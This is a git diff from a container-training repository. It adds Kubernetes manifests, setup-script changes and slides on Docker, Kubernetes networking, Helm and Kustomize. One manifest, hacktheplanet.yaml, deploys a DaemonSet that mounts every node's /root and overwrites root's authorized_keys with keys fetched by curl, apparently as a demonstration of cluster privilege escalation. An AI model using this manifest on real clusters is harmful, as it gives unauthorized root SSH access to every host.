Mirror of https://github.com/jpetazzo/container.training.git (synced 2026-02-14 17:49:59 +00:00)

Merge branch 'master' into user-certificates
k8s/hacktheplanet.yaml (new file, 34 lines)
@@ -0,0 +1,34 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hacktheplanet
spec:
  selector:
    matchLabels:
      app: hacktheplanet
  template:
    metadata:
      labels:
        app: hacktheplanet
    spec:
      volumes:
      - name: root
        hostPath:
          path: /root
      tolerations:
      - effect: NoSchedule
        operator: Exists
      initContainers:
      - name: hacktheplanet
        image: alpine
        volumeMounts:
        - name: root
          mountPath: /root
        command:
        - sh
        - -c
        - "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
      containers:
      - name: web
        image: nginx
k8s/persistent-consul.yaml (new file, 95 lines)
@@ -0,0 +1,95 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: consul
rules:
- apiGroups: [ "" ]
  resources: [ pods ]
  verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: consul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: consul
subjects:
- kind: ServiceAccount
  name: consul
  namespace: orange
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: consul
---
apiVersion: v1
kind: Service
metadata:
  name: consul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: consul
spec:
  serviceName: consul
  replicas: 3
  selector:
    matchLabels:
      app: consul
  volumeClaimTemplates:
  - metadata:
      name: data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 1Gi
  template:
    metadata:
      labels:
        app: consul
    spec:
      serviceAccountName: consul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: app
                operator: In
                values:
                - consul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.4.4"
        volumeMounts:
        - name: data
          mountPath: /consul/data
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/sh
              - -c
              - consul leave
k8s/psp-privileged.yaml (new file, 39 lines)
@@ -0,0 +1,39 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: privileged
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
  privileged: true
  allowPrivilegeEscalation: true
  allowedCapabilities:
  - '*'
  volumes:
  - '*'
  hostNetwork: true
  hostPorts:
  - min: 0
    max: 65535
  hostIPC: true
  hostPID: true
  runAsUser:
    rule: 'RunAsAny'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'RunAsAny'
  fsGroup:
    rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:privileged
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['privileged']
k8s/psp-restricted.yaml (new file, 38 lines)
@@ -0,0 +1,38 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
  annotations:
    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
    seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
  name: restricted
spec:
  allowPrivilegeEscalation: false
  fsGroup:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  volumes:
  - configMap
  - emptyDir
  - projected
  - secret
  - downwardAPI
  - persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:restricted
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['restricted']
k8s/volumes-for-consul.yaml (new file, 70 lines)
@@ -0,0 +1,70 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node2
  annotations:
    node: node2
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node3
  annotations:
    node: node3
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node4
  annotations:
    node: node4
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node4
@@ -248,6 +248,14 @@ EOF"
         sudo tar -C /usr/local/bin -zx ship
     fi"

+    # Install the AWS IAM authenticator
+    pssh "
+    if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
+      ##VERSION##
+      sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
+      sudo chmod +x /usr/local/bin/aws-iam-authenticator
+    fi"
+
     sep "Done"
 }

@@ -383,6 +391,15 @@ _cmd_retag() {
     aws_tag_instances $OLDTAG $NEWTAG
 }

+_cmd ssh "Open an SSH session to the first node of a tag"
+_cmd_ssh() {
+    TAG=$1
+    need_tag
+    IP=$(head -1 tags/$TAG/ips.txt)
+    info "Logging into $IP"
+    ssh docker@$IP
+}
+
 _cmd start "Start a group of VMs"
 _cmd_start() {
     while [ ! -z "$*" ]; do

@@ -481,12 +498,12 @@ _cmd_helmprom() {
     if i_am_first_node; then
         kubectl -n kube-system get serviceaccount helm ||
         kubectl -n kube-system create serviceaccount helm
-        helm init --service-account helm
+        sudo -u docker -H helm init --service-account helm
         kubectl get clusterrolebinding helm-can-do-everything ||
         kubectl create clusterrolebinding helm-can-do-everything \
             --clusterrole=cluster-admin \
             --serviceaccount=kube-system:helm
-        helm upgrade --install prometheus stable/prometheus \
+        sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
             --namespace kube-system \
             --set server.service.type=NodePort \
             --set server.service.nodePort=30090 \
@@ -186,22 +186,48 @@ Different deployments will use different underlying technologies.
|
||||
|
||||
---
|
||||
|
||||
## Section summary
|
||||
## Some popular service meshes
|
||||
|
||||
We've learned how to:
|
||||
... And related projects:
|
||||
|
||||
* Understand the ambassador pattern and what it is used for (service portability).
|
||||
|
||||
For more information about the ambassador pattern, including demos on Swarm and ECS:
|
||||
|
||||
* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
|
||||
|
||||
* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
|
||||
|
||||
Some services meshes and related projects:
|
||||
|
||||
* [Istio](https://istio.io/)
|
||||
|
||||
* [Linkerd](https://linkerd.io/)
|
||||
* [Consul Connect](https://www.consul.io/docs/connect/index.html)
|
||||
<br/>
|
||||
Transparently secures service-to-service connections with mTLS.
|
||||
|
||||
* [Gloo](https://gloo.solo.io/)
|
||||
<br/>
|
||||
API gateway that can interconnect applications on VMs, containers, and serverless.
|
||||
|
||||
* [Istio](https://istio.io/)
|
||||
<br/>
|
||||
A popular service mesh.
|
||||
|
||||
* [Linkerd](https://linkerd.io/)
|
||||
<br/>
|
||||
Another popular service mesh.
|
||||
|
||||
---
|
||||
|
||||
## Learning more about service meshes
|
||||
|
||||
A few blog posts about service meshes:
|
||||
|
||||
* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
|
||||
<br/>
|
||||
Provides historical context: how did we do before service meshes were invented?
|
||||
|
||||
* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
|
||||
<br/>
|
||||
Explains the purpose of service meshes. Illustrates some NGINX features.
|
||||
|
||||
* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
|
||||
<br/>
|
||||
Includes high-level overview and definitions.
|
||||
|
||||
* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
|
||||
<br/>
|
||||
Includes a step-by-step demo of Linkerd.
|
||||
|
||||
And a video:
|
||||
|
||||
* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
|
||||
|
||||
@@ -528,7 +528,9 @@ Very short instructions:
- `docker network create mynet --driver overlay`
- `docker service create --network mynet myimage`

-See https://jpetazzo.github.io/container.training for all the deets about clustering!
+If you want to learn more about Swarm mode, you can check
+[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
+or [these slides](https://container.training/swarm-selfpaced.yml.html).

---
slides/containers/Exercise_Composefile.md (new file, 5 lines)
@@ -0,0 +1,5 @@
# Exercise — writing a Compose file

Let's write a Compose file for the wordsmith app!

The code is at: https://github.com/jpetazzo/wordsmith
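For reference, one possible shape of that Compose file is sketched below. This is not the official solution: the service names, build directories, and published port are assumptions about the wordsmith repository.

```yaml
# Hedged sketch of a Compose file for wordsmith; directory names and
# ports are assumptions, not the official solution.
version: "3"

services:
  db:
    build: db        # database component
  words:
    build: words     # API serving random words
  web:
    build: web       # web frontend
    ports:
      - "8080:80"    # assumed: the frontend listens on port 80 in the container
```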
slides/containers/Exercise_Dockerfile_Advanced.md (new file, 9 lines)
@@ -0,0 +1,9 @@
# Exercise — writing better Dockerfiles

Let's update our Dockerfiles to leverage multi-stage builds!

The code is at: https://github.com/jpetazzo/wordsmith

Use a different tag for these images, so that we can compare their sizes.

What's the size difference between single-stage and multi-stage builds?

slides/containers/Exercise_Dockerfile_Basic.md (new file, 5 lines)
@@ -0,0 +1,5 @@
# Exercise — writing Dockerfiles

Let's write Dockerfiles for an existing application!

The code is at: https://github.com/jpetazzo/wordsmith
@@ -203,4 +203,90 @@ bash: figlet: command not found
|
||||
|
||||
* The basic Ubuntu image was used, and `figlet` is not here.
|
||||
|
||||
* We will see in the next chapters how to bake a custom image with `figlet`.
|
||||
---
|
||||
|
||||
## Where's my container?
|
||||
|
||||
* Can we reuse that container that we took time to customize?
|
||||
|
||||
*We can, but that's not the default workflow with Docker.*
|
||||
|
||||
* What's the default workflow, then?
|
||||
|
||||
*Always start with a fresh container.*
|
||||
<br/>
|
||||
*If we need something installed in our container, build a custom image.*
|
||||
|
||||
* That seems complicated!
|
||||
|
||||
*We'll see that it's actually pretty easy!*
|
||||
|
||||
* And what's the point?
|
||||
|
||||
*This puts a strong emphasis on automation and repeatability. Let's see why ...*
|
||||
|
||||
---
|
||||
|
||||
## Pets vs. Cattle
|
||||
|
||||
* In the "pets vs. cattle" metaphor, there are two kinds of servers.
|
||||
|
||||
* Pets:
|
||||
|
||||
* have distinctive names and unique configurations
|
||||
|
||||
* when they have an outage, we do everything we can to fix them
|
||||
|
||||
* Cattle:
|
||||
|
||||
* have generic names (e.g. with numbers) and generic configuration
|
||||
|
||||
* configuration is enforced by configuration management, golden images ...
|
||||
|
||||
* when they have an outage, we can replace them immediately with a new server
|
||||
|
||||
* What's the connection with Docker and containers?
|
||||
|
||||
---
|
||||
|
||||
## Local development environments
|
||||
|
||||
* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
|
||||
|
||||
* create VM from base template (Ubuntu, CentOS...)
|
||||
|
||||
* install packages, set up environment
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shutdown VM
|
||||
|
||||
* next time we need to work on project, restart VM as we left it
|
||||
|
||||
* if we need to tweak the environment, we do it live
|
||||
|
||||
* Over time, the VM configuration evolves, diverges.
|
||||
|
||||
* We don't have a clean, reliable, deterministic way to provision that environment.
|
||||
|
||||
---
|
||||
|
||||
## Local development with Docker
|
||||
|
||||
* With Docker, the workflow looks like this:
|
||||
|
||||
* create container image with our dev environment
|
||||
|
||||
* run container with that image
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shutdown container
|
||||
|
||||
* next time we need to work on project, start a new container
|
||||
|
||||
* if we need to tweak the environment, we create a new image
|
||||
|
||||
* We have a clear definition of our environment, and can share it reliably with others.
|
||||
|
||||
* Let's see in the next chapters how to bake a custom image with `figlet`!
|
||||
|
||||
@@ -70,8 +70,9 @@ class: pic
|
||||
|
||||
* An image is a read-only filesystem.
|
||||
|
||||
* A container is an encapsulated set of processes running in a
|
||||
read-write copy of that filesystem.
|
||||
* A container is an encapsulated set of processes,
|
||||
|
||||
running in a read-write copy of that filesystem.
|
||||
|
||||
* To optimize container boot time, *copy-on-write* is used
|
||||
instead of regular copy.
|
||||
@@ -177,8 +178,11 @@ Let's explain each of them.
|
||||
|
||||
## Root namespace
|
||||
|
||||
The root namespace is for official images. They are put there by Docker Inc.,
|
||||
but they are generally authored and maintained by third parties.
|
||||
The root namespace is for official images.
|
||||
|
||||
They are gated by Docker Inc.
|
||||
|
||||
They are generally authored and maintained by third parties.
|
||||
|
||||
Those images include:
|
||||
|
||||
@@ -188,7 +192,7 @@ Those images include:
|
||||
|
||||
* Ready-to-use components and services, like redis, postgresql...
|
||||
|
||||
* Over 130 at this point!
|
||||
* Over 150 at this point!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -6,8 +6,6 @@ In this chapter, we will:
|
||||
|
||||
* Present (from a high-level perspective) some orchestrators.
|
||||
|
||||
* Show one orchestrator (Kubernetes) in action.
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||
@@ -30,27 +30,11 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- - containers/Copying_Files_During_Build.md
|
||||
- |
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- |
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -64,13 +48,7 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- |
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- containers/Exercise_Composefile.md
|
||||
- - containers/Docker_Machine.md
|
||||
- containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -30,9 +30,11 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -45,6 +47,7 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -166,7 +166,7 @@
|
||||
|
||||
- Upgrade kubelet:
|
||||
```bash
|
||||
apt install kubelet=1.14.1-00
|
||||
apt install kubelet=1.14.2-00
|
||||
```
|
||||
|
||||
]
|
||||
@@ -267,7 +267,7 @@
|
||||
|
||||
- Perform the upgrade:
|
||||
```bash
|
||||
sudo kubeadm upgrade apply v1.14.1
|
||||
sudo kubeadm upgrade apply v1.14.2
|
||||
```
|
||||
|
||||
]
|
||||
@@ -287,8 +287,8 @@
|
||||
- Download the configuration on each node, and upgrade kubelet:
|
||||
```bash
|
||||
for N in 1 2 3; do
|
||||
ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.1
|
||||
ssh node $N sudo apt install kubelet=1.14.1-00
|
||||
ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
|
||||
ssh node$N sudo apt install kubelet=1.14.2-00
|
||||
done
|
||||
```
|
||||
]
|
||||
@@ -297,7 +297,7 @@
|
||||
|
||||
## Checking what we've done
|
||||
|
||||
- All our nodes should now be updated to version 1.14.1
|
||||
- All our nodes should now be updated to version 1.14.2
|
||||
|
||||
.exercise[
|
||||
|
||||
|
||||
@@ -136,6 +136,8 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Running the control plane on special nodes
|
||||
|
||||
- It is common to reserve a dedicated node for the control plane
|
||||
@@ -158,6 +160,8 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Running the control plane outside containers
|
||||
|
||||
- The services of the control plane can run in or out of containers
|
||||
@@ -177,6 +181,8 @@ class: pic
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
No!
|
||||
@@ -193,6 +199,8 @@ No!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
Yes!
|
||||
@@ -215,6 +223,8 @@ Yes!
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Do we need to run Docker at all?
|
||||
|
||||
- On our development environments, CI pipelines ... :
|
||||
@@ -231,25 +241,21 @@ Yes!
|
||||
|
||||
---
|
||||
|
||||
## Kubernetes resources
|
||||
## Interacting with Kubernetes
|
||||
|
||||
- The Kubernetes API defines a lot of objects called *resources*
|
||||
- We will interact with our Kubernetes cluster through the Kubernetes API
|
||||
|
||||
- These resources are organized by type, or `Kind` (in the API)
|
||||
- The Kubernetes API is (mostly) RESTful
|
||||
|
||||
- It allows us to create, read, update, delete *resources*
|
||||
|
||||
- A few common resource types are:
|
||||
|
||||
- node (a machine — physical or virtual — in our cluster)
|
||||
|
||||
- pod (group of containers running together on a node)
|
||||
|
||||
- service (stable network endpoint to connect to one or multiple containers)
|
||||
- namespace (more-or-less isolated group of things)
|
||||
- secret (bundle of sensitive data to be passed to a container)
|
||||
|
||||
And much more!
|
||||
|
||||
- We can see the full list by running `kubectl api-resources`
|
||||
|
||||
(In Kubernetes 1.10 and prior, the command to list API resources was `kubectl get`)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -69,3 +69,46 @@
|
||||
`Error: release loitering-otter failed: services "hasher" already exists`
|
||||
|
||||
- To avoid naming conflicts, we will deploy the application in another *namespace*
|
||||
|
||||
---
|
||||
|
||||
## Switching to another namespace
|
||||
|
||||
- We can create a new namespace and switch to it
|
||||
|
||||
(Helm will automatically use the namespace specified in our context)
|
||||
|
||||
- We can also tell Helm which namespace to use
|
||||
|
||||
.exercise[
|
||||
|
||||
- Tell Helm to use a specific namespace:
|
||||
```bash
|
||||
helm install dockercoins --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=magenta
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=magenta
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
|
||||
@@ -73,18 +73,13 @@
|
||||
|
||||
- Dump the `rng` resource in YAML:
|
||||
```bash
|
||||
kubectl get deploy/rng -o yaml --export >rng.yml
|
||||
kubectl get deploy/rng -o yaml >rng.yml
|
||||
```
|
||||
|
||||
- Edit `rng.yml`
|
||||
|
||||
]
|
||||
|
||||
Note: `--export` will remove "cluster-specific" information, i.e.:
|
||||
- namespace (so that the resource is not tied to a specific namespace)
|
||||
- status and creation timestamp (useless when creating a new resource)
|
||||
- resourceVersion and uid (these would cause... *interesting* problems)
|
||||
|
||||
---
|
||||
|
||||
## "Casting" a resource to another
|
||||
|
||||
@@ -1,6 +1,20 @@
## Declarative vs imperative in Kubernetes

- Virtually everything we create in Kubernetes is created from a *spec*

- With Kubernetes, we cannot say: "run this container"

- All we can do is write a *spec* and push it to the API server

  (by creating a resource like e.g. a Pod or a Deployment)

- The API server will validate that spec (and reject it if it's invalid)

- Then it will store it in etcd

- A *controller* will "notice" that spec and act upon it
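To make this concrete, here is a minimal sketch of such a spec (the name and image are placeholders): pushing it to the API server declares the desired state "one pod running nginx" instead of imperatively starting a container.

```yaml
# Minimal illustrative Pod spec; name and image are placeholders.
apiVersion: v1
kind: Pod
metadata:
  name: web
spec:
  containers:
  - name: nginx
    image: nginx
```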
---

## Reconciling state

- Watch for the `spec` fields in the YAML files later!
@@ -61,7 +61,7 @@ There are many possibilities!
|
||||
|
||||
- creates a new custom type, `Remote`, exposing a git+ssh server
|
||||
|
||||
- deploy by pushing YAML or Helm Charts to that remote
|
||||
- deploy by pushing YAML or Helm charts to that remote
|
||||
|
||||
- Replacing built-in types with CRDs
|
||||
|
||||
|
||||
@@ -234,6 +234,6 @@
|
||||
|
||||
(see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)
|
||||
|
||||
- Gitkube can also deploy Helm Charts
|
||||
- Gitkube can also deploy Helm charts
|
||||
|
||||
(instead of raw YAML files)
|
||||
|
||||
@@ -276,3 +276,21 @@ error: the server doesn't have a resource type "endpoint"
- There is no `endpoint` object: `type Endpoints struct`

- The type doesn't represent a single endpoint, but a list of endpoints

---

## Exposing services to the outside world

- The default type (ClusterIP) only works for internal traffic

- If we want to accept external traffic, we can use one of these:

  - NodePort (expose a service on a TCP port in the 30000-32767 range)

  - LoadBalancer (provision a cloud load balancer for our service)

  - ExternalIP (use one node's external IP address)

  - Ingress (a special mechanism for HTTP services)

*We'll see NodePorts and Ingresses more in detail later.*
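As an illustration, here is a hedged sketch of a NodePort Service (the name, selector, and port numbers are placeholders, not taken from the exercises):

```yaml
# Illustrative NodePort Service: exposes pods labeled app=webui
# on port 30080 of every node. If nodePort is omitted, Kubernetes
# picks a free port in the NodePort range.
apiVersion: v1
kind: Service
metadata:
  name: webui
spec:
  type: NodePort
  selector:
    app: webui
  ports:
  - port: 80          # port of the Service inside the cluster
    targetPort: 80    # port of the container
    nodePort: 30080   # port opened on every node
```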
@@ -79,6 +79,8 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Exploring types and definitions
|
||||
|
||||
- We can list all available resource types by running `kubectl api-resources`
|
||||
@@ -102,9 +104,11 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Introspection vs. documentation
|
||||
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.14/)
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/#api-reference)
|
||||
|
||||
- The API documentation is usually easier to read, but:
|
||||
|
||||
|
||||
@@ -320,6 +320,8 @@ We could! But the *deployment* would notice it right away, and scale back to the
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
### Streaming logs of many pods
|
||||
|
||||
- Let's see what happens if we try to stream the logs for more than 5 pods
|
||||
@@ -347,6 +349,8 @@ use --max-log-requests to increase the limit
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Why can't we stream the logs of many pods?
|
||||
|
||||
- `kubectl` opens one connection to the API server per pod
|
||||
|
||||
@@ -16,6 +16,8 @@
|
||||
|
||||
- each pod is aware of its IP address (no NAT)
|
||||
|
||||
- pod IP addresses are assigned by the network implementation
|
||||
|
||||
- Kubernetes doesn't mandate any particular implementation
|
||||
|
||||
---
|
||||
@@ -30,7 +32,7 @@
|
||||
|
||||
- No new protocol
|
||||
|
||||
- Pods cannot move from a node to another and keep their IP address
|
||||
- The network implementation can decide how to allocate addresses
|
||||
|
||||
- IP addresses don't have to be "portable" from a node to another
|
||||
|
||||
@@ -82,13 +84,17 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## The Container Network Interface (CNI)
|
||||
|
||||
- The CNI has a well-defined [specification](https://github.com/containernetworking/cni/blob/master/SPEC.md#network-configuration) for network plugins
|
||||
- Most Kubernetes clusters use CNI "plugins" to implement networking
|
||||
|
||||
- When a pod is created, Kubernetes delegates the network setup to CNI plugins
|
||||
- When a pod is created, Kubernetes delegates the network setup to these plugins
|
||||
|
||||
- Typically, a CNI plugin will:
|
||||
(it can be a single plugin, or a combination of plugins, each doing one task)
|
||||
|
||||
- Typically, CNI plugins will:
|
||||
|
||||
- allocate an IP address (by calling an IPAM plugin)
|
||||
|
||||
@@ -96,8 +102,46 @@
|
||||
|
||||
- configure the interface as well as required routes etc.
|
||||
|
||||
- Using multiple plugins can be done with "meta-plugins" like CNI-Genie or Multus
|
||||
---
|
||||
|
||||
- Not all CNI plugins are equal
|
||||
class: extra-details
|
||||
|
||||
(e.g. they don't all implement network policies, which are required to isolate pods)
|
||||
## Multiple moving parts
|
||||
|
||||
- The "pod-to-pod network" or "pod network":
|
||||
|
||||
- provides communication between pods and nodes
|
||||
|
||||
- is generally implemented with CNI plugins
|
||||
|
||||
- The "pod-to-service network":
|
||||
|
||||
- provides internal communication and load balancing
|
||||
|
||||
- is generally implemented with kube-proxy (or e.g. kube-router)
|
||||
|
||||
- Network policies:

  - provide firewalling and isolation

  - can be bundled with the "pod network" or provided by another component

    (a sketch of a network policy follows below)
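Here is a hedged sketch of such a policy (the labels are illustrative assumptions); it only takes effect if the CNI plugin in use actually implements network policies.

```yaml
# Illustrative NetworkPolicy: only pods labeled role=client may reach
# pods labeled app=consul on port 8500; all other ingress is denied.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-clients-to-consul
spec:
  podSelector:
    matchLabels:
      app: consul
  ingress:
  - from:
    - podSelector:
        matchLabels:
          role: client
    ports:
    - port: 8500
```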
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Even more moving parts
|
||||
|
||||
- Inbound traffic can be handled by multiple components:
|
||||
|
||||
- something like kube-proxy or kube-router (for NodePort services)
|
||||
|
||||
- load balancers (ideally, connected to the pod network)
|
||||
|
||||
- It is possible to use multiple pod networks in parallel
|
||||
|
||||
(with "meta-plugins" like CNI-Genie or Multus)
|
||||
|
||||
- Some solutions can fill multiple roles
|
||||
|
||||
(e.g. kube-router can be set up to provide the pod network and/or network policies and/or replace kube-proxy)
|
||||
|
||||
@@ -14,15 +14,15 @@

## Differences with Helm

-- Helm Charts use placeholders `{{ like.this }}`
+- Helm charts use placeholders `{{ like.this }}`

- Kustomize "bases" are standard Kubernetes YAML

- It is possible to use an existing set of YAML as a Kustomize base

-- As a result, writing a Helm Chart is more work ...
+- As a result, writing a Helm chart is more work ...

-- ... But Helm Charts are also more powerful; e.g. they can:
+- ... But Helm charts are also more powerful; e.g. they can:

  - use flags to conditionally include resources or blocks
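As a point of comparison, here is a hedged sketch of a minimal `kustomization.yaml` overlay (the base path and label are illustrative assumptions): it reuses an existing set of plain Kubernetes YAML as a base.

```yaml
# Minimal illustrative kustomization.yaml; the base path and label
# are assumptions made for the sake of the example.
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
bases:
- ../../base          # directory containing standard Kubernetes YAML
commonLabels:
  app: dockercoins
```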
@@ -88,11 +88,11 @@
|
||||
|
||||
- Change to a new directory:
|
||||
```bash
|
||||
mkdir ~/kubercoins
|
||||
cd ~/kubercoins
|
||||
mkdir ~/kustomcoins
|
||||
cd ~/kustomcoins
|
||||
```
|
||||
|
||||
- Run `ship init` with the kubercoins repository:
|
||||
- Run `ship init` with the kustomcoins repository:
|
||||
```bash
|
||||
ship init https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
@@ -146,3 +146,49 @@
|
||||
|
||||
- We will create a new copy of DockerCoins in another namespace
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Kustomize
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
